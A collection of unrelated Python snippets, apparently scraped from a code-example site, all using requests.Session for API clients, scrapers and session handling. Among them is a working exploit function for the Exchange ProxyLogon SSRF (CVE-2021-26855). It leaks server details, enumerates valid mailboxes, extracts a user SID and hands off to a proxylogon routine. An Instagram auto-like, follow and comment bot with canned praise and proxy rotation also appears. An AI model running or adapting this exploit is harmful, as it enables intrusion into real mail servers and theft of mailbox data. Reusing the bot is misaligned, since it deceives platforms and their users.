def __init__(self, logger=None):
     self.logger = logger or logging.getLogger(__name__)
     self.refresh_period = 45 * 60  # minutes * seconds
     self.last_authenticated = None
     self.session = requests.Session()
import os
import requests

god_session = requests.Session()
god_session.headers.update({
    'Authorization':
    'bearer ' + os.environ['SWAPPR_TANDA_GOD_TOKEN'],
    'Content-Type':
    'application/json'
})


def get(path):
    return god_session.get('https://my.tanda.co/api/v2/' + path)


def put(path, data=None):
    return god_session.put('https://my.tanda.co/api/v2/' + path, data=data)
Exemple #3
0
    def get_verifier(self, request_token=None, wp_user=None, wp_pass=None):
        """ pretends to be a browser, uses the authorize auth link, submits user creds to WP login form to get
        verifier string from access token """

        if request_token is None:
            request_token = self.request_token
        assert request_token, "need a valid request_token for this step"

        if wp_user is None and self.wp_user:
            wp_user = self.wp_user
        if wp_pass is None and self.wp_pass:
            wp_pass = self.wp_pass

        authorize_url = self.authentication['oauth1']['authorize']
        authorize_url = UrlUtils.add_query(authorize_url, 'oauth_token', request_token)

        # we're using a different session from the usual API calls
        # (I think the headers are incompatible?)

        # self.requester.get(authorize_url)
        authorize_session = requests.Session()

        login_form_response = authorize_session.get(authorize_url)
        login_form_params = {
            'username':wp_user,
            'password':wp_pass,
            'token':request_token
        }
        try:
            login_form_action, login_form_data = self.get_form_info(login_form_response, 'loginform')
        except AssertionError as exc:
            self.parse_login_form_error(
                login_form_response, exc, **login_form_params
            )

        for name, values in login_form_data.items():
            if name == 'log':
                login_form_data[name] = wp_user
            elif name == 'pwd':
                login_form_data[name] = wp_pass
            else:
                login_form_data[name] = values[0]

        assert 'log' in login_form_data, 'input for user login did not appear on form'
        assert 'pwd' in login_form_data, 'input for user password did not appear on form'

        # print "submitting login form to %s : %s" % (login_form_action, str(login_form_data))

        confirmation_response = authorize_session.post(login_form_action, data=login_form_data, allow_redirects=True)
        try:
            authorize_form_action, authorize_form_data = self.get_form_info(confirmation_response, 'oauth1_authorize_form')
        except AssertionError as exc:
            self.parse_login_form_error(
                confirmation_response, exc, **login_form_params
            )

        for name, values in authorize_form_data.items():
            if name == 'wp-submit':
                assert \
                    'authorize' in values, \
                    "apparently no authorize button, only %s" % str(values)
                authorize_form_data[name] = 'authorize'
            else:
                authorize_form_data[name] = values[0]

        assert 'wp-submit' in login_form_data, 'authorize button did not appear on form'

        final_response = authorize_session.post(authorize_form_action, data=authorize_form_data, allow_redirects=False)

        assert \
            final_response.status_code == 302, \
            "was not redirected by authorize screen, was %d instead. something went wrong" \
                % final_response.status_code
        assert 'location' in final_response.headers, "redirect did not provide redirect location in header"

        final_location = final_response.headers['location']

        # At this point we can chose to follow the redirect if the user wants,
        # or just parse the verifier out of the redirect url.
        # open to suggestions if anyone has any :)

        final_location_queries = parse_qs(urlparse(final_location).query)

        assert \
            'oauth_verifier' in final_location_queries, \
            "oauth verifier not provided in final redirect: %s" % final_location

        self._oauth_verifier = final_location_queries['oauth_verifier'][0]
        return self._oauth_verifier
def open_website():
    with requests.Session() as session:
        for website in list1:
            print(fetch(session,website))
Exemple #5
0
class EasyHttp(object):
    __session = requests.Session()

    @staticmethod
    def get_session():
        return EasyHttp.__session

    @staticmethod
    def load_cookies(cookie_path):
        load_cookiejar = cookiejar.LWPCookieJar()
        load_cookiejar.load(cookie_path,
                            ignore_discard=True,
                            ignore_expires=True)
        load_cookies = requests.utils.dict_from_cookiejar(load_cookiejar)
        EasyHttp.__session.cookies = requests.utils.cookiejar_from_dict(
            load_cookies)

    @staticmethod
    def save_cookies(cookie_path):
        new_cookie_jar = cookiejar.LWPCookieJar(cookie_path)
        requests.utils.cookiejar_from_dict(
            {c.name: c.value
             for c in EasyHttp.__session.cookies}, new_cookie_jar)
        new_cookie_jar.save(cookie_path,
                            ignore_discard=True,
                            ignore_expires=True)

    @staticmethod
    def updateHeaders(headers):
        EasyHttp.__session.headers.update(headers)

    @staticmethod
    def resetHeaders():
        EasyHttp.__session.headers.clear()
        EasyHttp.__session.headers.update({
            'User-Agent':
            random.choice(USER_AGENT),
        })

    @staticmethod
    def setCookies(**kwargs):
        for k, v in kwargs.items():
            EasyHttp.__session.cookies.set(k, v)

    @staticmethod
    def removeCookies(key=None):
        EasyHttp.__session.cookies.set(
            key, None) if key else EasyHttp.__session.cookies.clear()

    @staticmethod
    @sendLogic
    def send(urlInfo, params=None, data=None, **kwargs):
        EasyHttp.resetHeaders()
        if 'headers' in urlInfo and urlInfo['headers']:
            EasyHttp.updateHeaders(urlInfo['headers'])
        try:
            if len(ips) == 0:
                response = EasyHttp.__session.request(method=urlInfo['method'],
                                                      url=urlInfo['url'],
                                                      params=params,
                                                      data=data,
                                                      timeout=10,
                                                      allow_redirects=False,
                                                      **kwargs)
            else:
                response = EasyHttp.__session.request(
                    method=urlInfo['method'],
                    url=urlInfo['url'],
                    params=params,
                    data=data,
                    #python3发现proxies写成{"https": "https://{}"}的形式没法访问,笑哭-_-
                    proxies={
                        "http": "http://{}".format(random.choice(ips)[0])
                    },
                    timeout=10,
                    allow_redirects=False,
                    **kwargs)
            if response.status_code == requests.codes.ok:
                if 'response' in urlInfo:
                    if urlInfo['response'] == 'binary':
                        return response.content
                    if urlInfo['response'] == 'html':
                        response.encoding = response.apparent_encoding
                        return response.text
                return response.json()
        except:
            pass
        return None

    @staticmethod
    @sendLogic
    def getHtmlTree(url, **kwargs):
        """
        获取html树
        """
        time.sleep(1)
        headers = {
            'Connection': 'keep-alive',
            'Cache-Control': 'max-age=0',
            'Upgrade-Insecure-Requests': '1',
            'User-Agent':
            'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_3) AppleWebKit/537.36 (KHTML, like Gecko)',
            'Accept':
            'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8',
            'Accept-Encoding': 'gzip, deflate, sdch',
            'Accept-Language': 'zh-CN,zh;q=0.8',
        }
        try:
            response = EasyHttp.__session.request(
                method='GET',
                url=url,
                # headers=headers,
                timeout=10,
                allow_redirects=False,
                **kwargs)
            if response.status_code == requests.codes.ok:
                return html.etree.HTML(response.text)
        except Exception as e:
            return None
        return None

    @staticmethod
    @sendLogic
    def get(url, timeout):
        try:
            response = EasyHttp.__session.request(method='GET',
                                                  url=url,
                                                  timeout=timeout,
                                                  allow_redirects=False)
            if response.status_code == requests.codes.ok:
                return response.text
        except Exception as e:
            return None
        return None

    @staticmethod
    @sendLogic
    def get_custom(urlInfo):
        try:
            response = EasyHttp.__session.request(method=urlInfo['method'],
                                                  url=urlInfo['url'],
                                                  timeout=10,
                                                  allow_redirects=False)
        except Exception as e:
            return None
        return response

    @staticmethod
    @sendLogic
    def post_custom(urlInfo, data=None):
        EasyHttp.resetHeaders()
        if 'headers' in urlInfo and urlInfo['headers']:
            EasyHttp.updateHeaders(urlInfo['headers'])
        try:
            if len(ips) == 0:
                response = EasyHttp.__session.request(method=urlInfo['method'],
                                                      url=urlInfo['url'],
                                                      data=data,
                                                      timeout=10,
                                                      allow_redirects=False)
            else:
                response = EasyHttp.__session.request(
                    method=urlInfo['method'],
                    url=urlInfo['url'],
                    data=data,
                    proxies={
                        "http": "http://{}".format(random.choice(ips)[0])
                    },
                    timeout=10,
                    allow_redirects=False)
        except Exception as e:
            return None
        return response
Exemple #6
0
# 다음 쇼핑 best100 정보 가져오기

# https://shoppinghow.kakao.com/siso/p/api/bestRank/dispprodbest?vCateId=GMP&durationDays=30&count=100&_=1614242561449
# product_name만 출력
import requests

url = "https://shoppinghow.kakao.com/siso/p/api/bestRank/dispprodbest?vCateId=GMP&durationDays=30&count=100&_=1614242561449"


with requests.Session() as s:
    r = s.get(url)

    for i, item in enumerate(r.json(), 1):  # 1번부터 순번으로 출력
        if i < 101:
            print(i, item["product_name"])

    # for i, row in r.json():
    #     for k,v in row.items():
    #         print("key : {}, value : {}".format(k,v))
    #     print()
Exemple #7
0
    def __init__(self,
                 login,
                 password,
                 like_per_day=1000,
                 media_max_like=50,
                 media_min_like=0,
                 follow_per_day=0,
                 follow_time=5 * 60 * 60,
                 unfollow_per_day=0,
                 start_at_h=0,
                 start_at_m=0,
                 end_at_h=23,
                 end_at_m=59,
                 database_name='follows_db.db',
                 comment_list=[["this", "the", "your"],
                               ["photo", "picture", "pic", "shot", "snapshot"],
                               ["is", "looks", "feels", "is really"],
                               ["great", "super", "good", "very good", "good",
                                "wow", "WOW", "cool", "GREAT", "magnificent",
                                "magical", "very cool", "stylish", "beautiful",
                                "so beautiful", "so stylish", "so professional",
                                "lovely", "so lovely", "very lovely", "glorious",
                                "so glorious", "very glorious", "adorable",
                                "excellent", "amazing"],
                               [".", "..", "...", "!", "!!", "!!!"]],
                 comments_per_day=0,
                 tag_list=['cat', 'car', 'dog'],
                 max_like_for_one_tag=5,
                 unfollow_break_min=15,
                 unfollow_break_max=30,
                 log_mod=0,
                 proxy="",
                 user_blacklist={},
                 tag_blacklist=[],
                 unwanted_username_list=[],
                 unfollow_whitelist=[]):

        self.database_name = database_name
        self.follows_db = sqlite3.connect(database_name, timeout=0, isolation_level=None)
        self.follows_db_c = self.follows_db.cursor()
        check_and_update(self)
        fake_ua = UserAgent()
        self.user_agent = check_and_insert_user_agent(self, str(fake_ua.random))
        self.bot_start = datetime.datetime.now()
        self.start_at_h = start_at_h
        self.start_at_m = start_at_m
        self.end_at_h = end_at_h
        self.end_at_m = end_at_m
        self.unfollow_break_min = unfollow_break_min
        self.unfollow_break_max = unfollow_break_max
        self.user_blacklist = user_blacklist
        self.tag_blacklist = tag_blacklist
        self.unfollow_whitelist = unfollow_whitelist
        self.comment_list = comment_list

        self.time_in_day = 24 * 60 * 60
        # Like
        self.like_per_day = like_per_day
        if self.like_per_day != 0:
            self.like_delay = self.time_in_day / self.like_per_day

        # Follow
        self.follow_time = follow_time
        self.follow_per_day = follow_per_day
        if self.follow_per_day != 0:
            self.follow_delay = self.time_in_day / self.follow_per_day

        # Unfollow
        self.unfollow_per_day = unfollow_per_day
        if self.unfollow_per_day != 0:
            self.unfollow_delay = self.time_in_day / self.unfollow_per_day

        # Comment
        self.comments_per_day = comments_per_day
        if self.comments_per_day != 0:
            self.comments_delay = self.time_in_day / self.comments_per_day

        # Don't like if media have more than n likes.
        self.media_max_like = media_max_like
        # Don't like if media have less than n likes.
        self.media_min_like = media_min_like
        # Auto mod seting:
        # Default list of tag.
        self.tag_list = tag_list
        # Get random tag, from tag_list, and like (1 to n) times.
        self.max_like_for_one_tag = max_like_for_one_tag
        # log_mod 0 to console, 1 to file
        self.log_mod = log_mod
        self.s = requests.Session()
        # if you need proxy make something like this:
        # self.s.proxies = {"https" : "http://proxyip:proxyport"}
        # by @ageorgios
        if proxy != "":
            proxies = {
                'http': 'http://' + proxy,
                'https': 'http://' + proxy,
            }
            self.s.proxies.update(proxies)
        # convert login to lower
        self.user_login = login.lower()
        self.user_password = password
        self.bot_mode = 0
        self.media_by_tag = []
        self.media_on_feed = []
        self.media_by_user = []
        self.unwanted_username_list = unwanted_username_list
        now_time = datetime.datetime.now()
        log_string = 'Instabot v1.2.0 started at %s:\n' % \
                     (now_time.strftime("%d.%m.%Y %H:%M"))
        self.write_log(log_string)
        self.login()
        self.populate_user_blacklist()
        signal.signal(signal.SIGTERM, self.cleanup)
        atexit.register(self.cleanup)
def get_session():
    if not hasattr(thread_local, "session"):
        thread_local.session = requests.Session()
    return thread_local.session
Exemple #9
0
    def __init__(self, api_key: str, host: str = 'http://localhost:5000'):
        self.api_key = api_key
        self.host = host

        self.s = requests.Session()
        self.s.headers.update({"Authorization": f"Key {api_key}"})
Exemple #10
0
    def __init__(self):

        self.S = requests.Session()
Exemple #11
0
    def __init__(self,
                 web_interface_url,
                 user_pwd,
                 svn_branch='trunk',
                 svn_revision='HEAD',
                 thread_count=1,
                 result_poll_interval=2,
                 user_agent=None,
                 version=None):
        """
        Creates a new WebInterface object.
        The given svn revision is resolved (e.g. 'HEAD' -> 17495).
        @param web_interface_url: the base URL of the VerifierCloud's web interface
        @param user_pwd: user name and password in the format '<user_name>:<password>' or none if no authentification is required
        @param svn_branch: the svn branch name or 'trunk', defaults to 'trunk'
        @param svn_revision: the svn revision number or 'HEAD', defaults to 'HEAD'
        @param thread_count: the number of threads for fetching results in parallel
        @param result_poll_interval: the number of seconds to wait between polling results
        """
        if not (1 <= thread_count <= MAX_SUBMISSION_THREADS):
            sys.exit(
                "Invalid number {} of client threads, needs to be between 1 and {}."
                .format(thread_count, MAX_SUBMISSION_THREADS))
        if not 1 <= result_poll_interval:
            sys.exit("Poll interval {} is too small, needs to be at least 1s.".
                     format(result_poll_interval))
        if not web_interface_url[-1] == '/':
            web_interface_url += '/'

        default_headers = {'Connection': 'Keep-Alive'}
        if user_agent:
            default_headers['User-Agent'] = \
                '{}/{} (Python/{} {}/{})'.format(user_agent, version, platform.python_version(), platform.system(), platform.release())

        urllib.parse.urlparse(web_interface_url)  # sanity check
        self._web_interface_url = web_interface_url
        logging.info('Using VerifierCloud at %s', web_interface_url)

        self._connection = requests.Session()
        self._connection.headers.update(default_headers)
        self._connection.verify = '/etc/ssl/certs'
        if user_pwd:
            self._connection.auth = (user_pwd.split(":")[0],
                                     user_pwd.split(":")[1])
            self._base64_user_pwd = base64.b64encode(
                user_pwd.encode("utf-8")).decode("utf-8")
        else:
            self._base64_user_pwd = None

        self._unfinished_runs = {}
        self._unfinished_runs_lock = threading.Lock()
        self._downloading_result_futures = {}
        self._download_attempts = {}
        self.thread_count = thread_count
        self._executor = ThreadPoolExecutor(thread_count)
        self._thread_local = threading.local()
        self._hash_code_cache = {}
        self._group_id = str(random.randint(0, 1000000))
        self._read_hash_code_cache()
        self._resolved_tool_revision(svn_branch, svn_revision)
        self._tool_name = self._request_tool_name()

        try:
            self._result_downloader = SseResultDownloader(
                self, result_poll_interval)
        except:
            self._result_downloader = PollingResultDownloader(
                self, result_poll_interval)
    def process_data(self):
        station_id = None
        try:
            self.log.info('Processing Thunerwetter data...')

            date_pattern = re.compile(r'am (?P<date>.*?) um (?P<time>.*?) Uhr')
            wind_pattern = re.compile(
                r'(?P<wind_speed>[0-9]{1,3}\.[0-9]) km/h / '
                r'(?P<wind_dir>[A-Z]{1,2}(-[A-Z]{1,2})?)')
            wind_directions = {
                'N': 0,
                'N-NO': 1 * (360 / 16),
                'NO': 2 * (360 / 16),
                'O-NO': 3 * (360 / 16),
                'O': 4 * (360 / 16),
                'O-SO': 5 * (360 / 16),
                'SO': 6 * (360 / 16),
                'S-SO': 7 * (360 / 16),
                'S': 8 * (360 / 16),
                'S-SW': 9 * (360 / 16),
                'SW': 10 * (360 / 16),
                'W-SW': 11 * (360 / 16),
                'W': 12 * (360 / 16),
                'W-NW': 13 * (360 / 16),
                'NW': 14 * (360 / 16),
                'N-NW': 15 * (360 / 16),
            }
            temp_pattern = re.compile(r'(?P<temp>[-+]?[0-9]{1,3}\.[0-9]) °C')
            humidity_pattern = re.compile(r'(?P<humidity>[0-9]{1,3}) %')

            thun_tz = tz.gettz('Europe/Zurich')

            session = requests.Session()
            session.headers.update(user_agents.chrome)

            wind_tree = html.fromstring(
                session.get(self.provider_url,
                            timeout=(self.connect_timeout,
                                     self.read_timeout)).text)

            # Date
            date_element = wind_tree.xpath(
                '//td[text()[contains(.,"Messwerte von Thun")]]')[0]
            date_text = date_element.text.strip()
            date = date_pattern.search(date_text).groupdict()

            station = self.save_station('westquartier',
                                        'Thun Westquartier',
                                        'Thun Westquartier',
                                        float(46.7536663),
                                        float(7.6211841),
                                        StationStatus.GREEN,
                                        url=self.provider_url)
            station_id = station['_id']

            key = arrow.get(
                f'{date["date"]} {date["time"]}',
                'DD.MM.YYYY HH:mm').replace(tzinfo=thun_tz).timestamp

            measures_collection = self.measures_collection(station_id)
            new_measures = []

            if not self.has_measure(measures_collection, key):
                wind_elements = wind_tree.xpath('//td[text()="Ø 10 Minuten"]')

                # Wind average
                wind_avg_text = wind_elements[0].xpath(
                    'following-sibling::td')[0].text.strip()
                wind_avg = wind_pattern.search(wind_avg_text).groupdict()

                # Wind max
                wind_max_text = wind_elements[1].xpath(
                    'following-sibling::td')[0].text.strip()
                wind_max = wind_pattern.search(wind_max_text).groupdict()

                air_tree = html.fromstring(
                    session.get(self.provider_url_temp,
                                timeout=(self.connect_timeout,
                                         self.read_timeout)).text)

                # Date
                date_element = air_tree.xpath(
                    '//td[text()[contains(.,"Messwerte von Thun")]]')[0]
                date_text = date_element.text.strip()
                date = date_pattern.search(date_text).groupdict()
                air_date = arrow.get(
                    f'{date["date"]} {date["time"]}',
                    'DD.MM.YYYY HH:mm').replace(tzinfo=thun_tz).timestamp

                if air_date != key:
                    raise ProviderException(
                        'Wind and air dates are not matching')

                air_elements = air_tree.xpath('//td[text()="aktuell"]')

                # Temperature
                temp_text = air_elements[0].xpath(
                    'following-sibling::td')[0].text.strip()
                temp = temp_pattern.search(temp_text).groupdict()

                # Humidity
                humidity_text = air_elements[1].xpath(
                    'following-sibling::td')[0].text.strip()
                humidity = humidity_pattern.search(humidity_text).groupdict()

                measure = self.create_measure(
                    station,
                    key,
                    wind_directions[wind_avg['wind_dir']],
                    wind_avg['wind_speed'],
                    wind_max['wind_speed'],
                    temperature=temp['temp'],
                    humidity=humidity['humidity'])
                new_measures.append(measure)

            self.insert_new_measures(measures_collection, station,
                                     new_measures)

        except ProviderException as e:
            self.log.warning(
                f"Error while processing station '{station_id}': {e}")
        except Exception as e:
            self.log.exception(
                f"Error while processing station '{station_id}': {e}")

        self.log.info('...Done!')
Exemple #13
0
 def __init__(self, host='localhost', port=GETH_DEFAULT_RPC_PORT, tls=False):
     self.host = host
     self.port = port
     self.tls = tls
     self.session = requests.Session()
     self.session.mount(self.host, HTTPAdapter(max_retries=MAX_RETRIES))
    def process_data(self):
        station_id = None
        try:
            self.log.info("Processing Thunerwetter data...")

            date_pattern = re.compile(r"am (?P<date>.*?) um (?P<time>.*?) Uhr")
            wind_pattern = re.compile(
                r"(?P<wind_speed>[0-9]{1,3}\.[0-9]) km/h / " r"(?P<wind_dir>[A-Z]{1,2}(-[A-Z]{1,2})?)"
            )
            wind_directions = {
                "N": 0,
                "N-NO": 1 * (360 / 16),
                "NO": 2 * (360 / 16),
                "O-NO": 3 * (360 / 16),
                "O": 4 * (360 / 16),
                "O-SO": 5 * (360 / 16),
                "SO": 6 * (360 / 16),
                "S-SO": 7 * (360 / 16),
                "S": 8 * (360 / 16),
                "S-SW": 9 * (360 / 16),
                "SW": 10 * (360 / 16),
                "W-SW": 11 * (360 / 16),
                "W": 12 * (360 / 16),
                "W-NW": 13 * (360 / 16),
                "NW": 14 * (360 / 16),
                "N-NW": 15 * (360 / 16),
            }
            temp_pattern = re.compile(r"(?P<temp>[-+]?[0-9]{1,3}\.[0-9]) °C")
            humidity_pattern = re.compile(r"(?P<humidity>[0-9]{1,3}) %")

            thun_tz = tz.gettz("Europe/Zurich")

            session = requests.Session()
            session.headers.update(user_agents.chrome)

            wind_tree = html.fromstring(
                session.get(self.provider_url, timeout=(self.connect_timeout, self.read_timeout)).text
            )

            # Date
            date_element = wind_tree.xpath('//td[text()[contains(.,"Messwerte von Thun")]]')[0]
            date_text = date_element.text.strip()
            date = date_pattern.search(date_text).groupdict()

            station = self.save_station(
                "westquartier",
                "Thun Westquartier",
                "Thun Westquartier",
                float(46.7536663),
                float(7.6211841),
                StationStatus.GREEN,
                url=self.provider_url,
            )
            station_id = station["_id"]

            key = arrow.get(f'{date["date"]} {date["time"]}', "DD.MM.YYYY HH:mm").replace(tzinfo=thun_tz).int_timestamp

            measures_collection = self.measures_collection(station_id)
            new_measures = []

            if not self.has_measure(measures_collection, key):
                wind_elements = wind_tree.xpath('//td[text()="Ø 10 Minuten"]')

                # Wind average
                wind_avg_text = wind_elements[0].xpath("following-sibling::td")[0].text.strip()
                wind_avg = wind_pattern.search(wind_avg_text).groupdict()

                # Wind max
                wind_max_text = wind_elements[1].xpath("following-sibling::td")[0].text.strip()
                wind_max = wind_pattern.search(wind_max_text).groupdict()

                air_tree = html.fromstring(
                    session.get(self.provider_url_temp, timeout=(self.connect_timeout, self.read_timeout)).text
                )

                # Date
                date_element = air_tree.xpath('//td[text()[contains(.,"Messwerte von Thun")]]')[0]
                date_text = date_element.text.strip()
                date = date_pattern.search(date_text).groupdict()
                air_date = (
                    arrow.get(f'{date["date"]} {date["time"]}', "DD.MM.YYYY HH:mm")
                    .replace(tzinfo=thun_tz)
                    .int_timestamp
                )

                if air_date != key:
                    raise ProviderException("Wind and air dates are not matching")

                air_elements = air_tree.xpath('//td[text()="aktuell"]')

                # Temperature
                temp_text = air_elements[0].xpath("following-sibling::td")[0].text.strip()
                temp = temp_pattern.search(temp_text).groupdict()

                # Humidity
                humidity_text = air_elements[1].xpath("following-sibling::td")[0].text.strip()
                humidity = humidity_pattern.search(humidity_text).groupdict()

                measure = self.create_measure(
                    station,
                    key,
                    wind_directions[wind_avg["wind_dir"]],
                    wind_avg["wind_speed"],
                    wind_max["wind_speed"],
                    temperature=temp["temp"],
                    humidity=humidity["humidity"],
                )
                new_measures.append(measure)

            self.insert_new_measures(measures_collection, station, new_measures)

        except ProviderException as e:
            self.log.warning(f"Error while processing station '{station_id}': {e}")
        except Exception as e:
            self.log.exception(f"Error while processing station '{station_id}': {e}")

        self.log.info("...Done!")
def exploit(url):
    try:
        print('[*] Target: %s' % url)
        server = url + '/owa/auth.owa'
        s = requests.Session()
        req = s.post(server, verify=False)
        if not req.status_code == 400:
            print('[-] Cant get FQDN!')
            exit(0)
        server_name = req.headers["X-FEServer"]
        print('(*) Getting FQDN Name: %s' % (server_name))
        path_maybe_vuln = '/ecp/ssrf.js'
        headers = {
            'User-Agent':
            'Hello-World',
            'Cookie':
            'X-BEResource={FQDN}/EWS/Exchange.asmx?a=~1942062522;'.format(
                FQDN=server_name),
            'Connection':
            'close',
            'Content-Type':
            'text/xml',
            'Accept-Encoding':
            'gzip'
        }
        payload = """<?xml version="1.0" encoding="utf-8"?>
					<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" 
					xmlns:m="http://schemas.microsoft.com/exchange/services/2006/messages" 
					xmlns:t="http://schemas.microsoft.com/exchange/services/2006/types" 
					xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
					    <soap:Body>
					        <m:GetFolder>
					            <m:FolderShape>
					                <t:BaseShape>Default</t:BaseShape>
					            </m:FolderShape>
					            <m:FolderIds>
					                <t:DistinguishedFolderId Id="inbox">
					                    <t:Mailbox>
					                        <t:EmailAddress>[email protected]</t:EmailAddress>
					                    </t:Mailbox>
					                </t:DistinguishedFolderId>
					            </m:FolderIds>
					        </m:GetFolder>
					    </soap:Body>
					</soap:Envelope>
		"""
        reqs = s.post('%s/%s' % (url, path_maybe_vuln),
                      headers=headers,
                      data=payload,
                      verify=False)
        if reqs.status_code == 200:
            print('(+) Target is Vuln to SSRF [CVE-2021-26855]!')
            print('(*) Getting Information Server')
            print('(+) Computer Name = %s' % reqs.headers["X-DiagInfo"])
            print('(+) Domain Name = %s' %
                  reqs.headers["X-CalculatedBETarget"].split(',')[1])
            print('(+) Guest SID = %s' % reqs.headers["Set-Cookie"].split(
                'X-BackEndCookie=')[1].split(';')[0])
            print('(*) Find valid mail from users list')
            u_m = reqs.headers["X-CalculatedBETarget"].split(',')[1]
            f = open('users.txt').read().splitlines()
            print('+ %s' % reqs.headers["X-CalculatedBETarget"].split(',')[1])
            X = input('(+) Put Domain Server without Subdomain: ')
            for u in f:
                domainstr = tldextract.extract(u_m)
                domain = "{}.{}".format(domainstr.domain, domainstr.suffix)
                user = u
                if ('local' in u_m):
                    domain = '%s.local' % reqs.headers[
                        "X-CalculatedBETarget"].split(',')[1].split('.')[1]
                elif X == '':
                    #	else:
                    domainstr = tldextract.extract(u_m)
                    domain = "{}.{}".format(domainstr.domain, domainstr.suffix)
                else:
                    domain = X
                mail_valid = '{user}@{domain}'.format(user=user, domain=domain)
                headers_for_discover = {
                    "User-Agent":
                    "Hello-World",
                    "Cookie":
                    "X-BEResource=Admin@{FQDN}:444/autodiscover/autodiscover.xml?a=~1942062522;"
                    .format(FQDN=server_name),
                    "Connection":
                    "close",
                    "Upgrade-Insecure-Requests":
                    "1",
                    "Content-Type":
                    "text/xml"
                }
                autodiscover_payload = '''
				<Autodiscover xmlns="http://schemas.microsoft.com/exchange/autodiscover/outlook/requestschema/2006">
			    <Request>
			      <EMailAddress>{mail}</EMailAddress>
			      <AcceptableResponseSchema>http://schemas.microsoft.com/exchange/autodiscover/outlook/responseschema/2006a</AcceptableResponseSchema>
			    </Request>
			</Autodiscover>
				'''.format(mail=mail_valid)
                r3q = s.post('%s/%s' % (url, path_maybe_vuln),
                             headers=headers_for_discover,
                             data=autodiscover_payload,
                             verify=False)
                #print(r3q.text)
                if 'DisplayName' in r3q.text:
                    print('-' * 35)
                    print('(+) %s | Valid Mail!' % (mail_valid))
                    txtstr = """%s""" % (r3q.text)
                    display_name = re.findall(
                        '(?:<DisplayName>)(.+?)(?:</DisplayName>)', txtstr)
                    legacyDN = re.findall('(?:<LegacyDN>)(.+?)(?:</LegacyDN>)',
                                          txtstr)
                    server = r3q.text.split('<Server>')[1].split(
                        '</Server>')[0]
                    #oabId = ''
                    # try:
                    # 	oabId = atreq.text.split('/oab/')[1].split('/')[0]
                    # except:
                    # 	pass
                    print('(+) Server = %s' % server)
                    groupname = re.findall(
                        '(?:<GroupingInformation>)(.+?)(?:</GroupingInformation>)',
                        txtstr)
                    mapi_body = legacyDN[
                        0] + "\x00\x00\x00\x00\x00\xe4\x04\x00\x00\x09\x04\x00\x00\x09\x04\x00\x00\x00\x00\x00\x00"
                    mapireq = requests.post(
                        "%s/%s" % (url, path_maybe_vuln),
                        headers={
                            "Cookie":
                            "X-BEResource=Admin@%s:444/mapi/emsmdb?MailboxId=%s&a=~1942062522;"
                            % (server_name, server),
                            "Content-Type":
                            "application/mapi-http",
                            "X-Requesttype":
                            "Connect",
                            "X-Clientinfo":
                            "{2F94A2BF-A2E6-4CCCC-BF98-B5F22C542226}",
                            "X-Clientapplication":
                            "Outlook/15.0.4815.1002",
                            "X-Requestid":
                            "{C715155F-2BE8-44E0-BD34-2960067874C8}:500",
                            "User-Agent":
                            "Hello-World"
                        },
                        data=mapi_body,
                        verify=False)
                    try:
                        if mapireq.status_code != 200 or "act as owner of a UserMailbox" not in mapireq.text:
                            exit(0)
                        else:
                            sid = mapireq.text.split("with SID ")[1].split(
                                " and MasterAccountSid")[0]
                    except IndexError:
                        exit(0)
                    print('(*) Tested ProxyLogon!')
                    proxylogon(url, mail_valid, server_name, sid)
                    exit(0)
                else:
                    #print(r3q.text)
                    #xmessage = r3q.text.split('<Message>')[1].split('<Message>')[0]
                    print('(-) %s | Invalid mail' % (mail_valid))
            exit(0)
        else:
            print('(-) Target is not Vuln to SSRF [CVE-2021-26855]!')
    #except Exception as e:
    #print(e)
    #pass
    except (requests.ConnectionError, requests.ConnectTimeout,
            requests.ReadTimeout) as e:
        print(e)
        pass
Exemple #16
0
 def setup(self):
     self.session = requests.Session()
def replay(repo_dir, repo_path, start, end, project_id, dry_run, verbose):
    repo = git.Repo(repo_dir)

    end = repo.commit(end)
    start = repo.commit(start)

    username = config.jira_basic_auth_username
    password = config.jira_basic_auth_password

    jira_session = requests.Session()
    auth_data = {
        'username': config.jira_username,
        'password': config.jira_password
    }
    jira_session.post(config.jira_url + '/rest/auth/1/session',
                      json=auth_data,
                      auth=(username, password))

    data = OrderedDict()
    data['object_kind'] = 'push'

    commits = [
        commit for commit in recurse_commits(end,
                                             start=start,
                                             jira_session=jira_session,
                                             repo_path=repo_path,
                                             verbose=verbose)
    ]
    if not commits or len(commits) == 0:
        logger.warn("Found no commits")
        return

    last_commit = commits[-1]
    if len(last_commit.parents) >= 1:
        data['before'] = last_commit.parents[0].hexsha
    else:
        data['before'] = '0000000000000000000000000000000000000000'

    data['after'] = commits[0].hexsha
    data['ref'] = 'refs/heads/master'
    data['checkout_sha'] = commits[0].hexsha
    data['repository'] = OrderedDict()
    data['repository']['url'] = 'git@%s:%s.git' % (config.git_base_url,
                                                   repo_path)
    data['repository']['homepage'] = 'https://%s/%s' % (config.git_base_url,
                                                        repo_path)
    data['repository']['description'] = ''
    data['repository']['git_http_url'] = 'https://%s/%s.git' % (
        config.git_base_url, repo_path)
    data['repository']['git_ssh_url'] = 'git@%s:%s.git' % (config.git_base_url,
                                                           repo_path)

    data['project_id'] = project_id

    data['commits'] = []

    for commit in commits:
        date = time.strftime('%Y-%m-%dT%H:%M:%S',
                             time.gmtime(commit.authored_date))
        logger.info("%20s @%s (%s): %s" %
                    (commit.author, date, commit.hexsha[:7], commit.summary))

        commit_data = OrderedDict()
        commit_data['id'] = commit.hexsha
        commit_data['message'] = commit.message

        if commit.author_tz_offset == -3600:
            offset = '+01:00'
        elif commit.author_tz_offset == -7200:
            offset = '+02:00'
        elif commit.author_tz_offset == 0:
            offset = '+00:00'
        else:
            assert False, "illegal offset: %s" % repr(commit.author_tz_offset)

        commit_data['timestamp'] = (time.strftime(
            '%Y-%m-%dT%H:%M:%S' + offset, time.gmtime(commit.authored_date)))
        commit_data['url'] = data['repository'][
            'homepage'] + '/commit/' + commit.hexsha
        commit_data['author'] = OrderedDict()
        commit_data['author']['name'] = commit.author.name
        commit_data['author']['email'] = commit.author.email

        commit_data['added'] = []
        commit_data['modified'] = []
        commit_data['removed'] = []

        for added in commit.parents[0].diff(commit).iter_change_type('A'):
            commit_data['added'].append(added.b_path)

        for modified in commit.parents[0].diff(commit).iter_change_type('M'):
            commit_data['modified'].append(modified.b_path)

        for deleted in commit.parents[0].diff(commit).iter_change_type('D'):
            commit_data['removed'].append(deleted.a_path)

        data['commits'].append(commit_data)

    data['total_commits_count'] = len(commits)

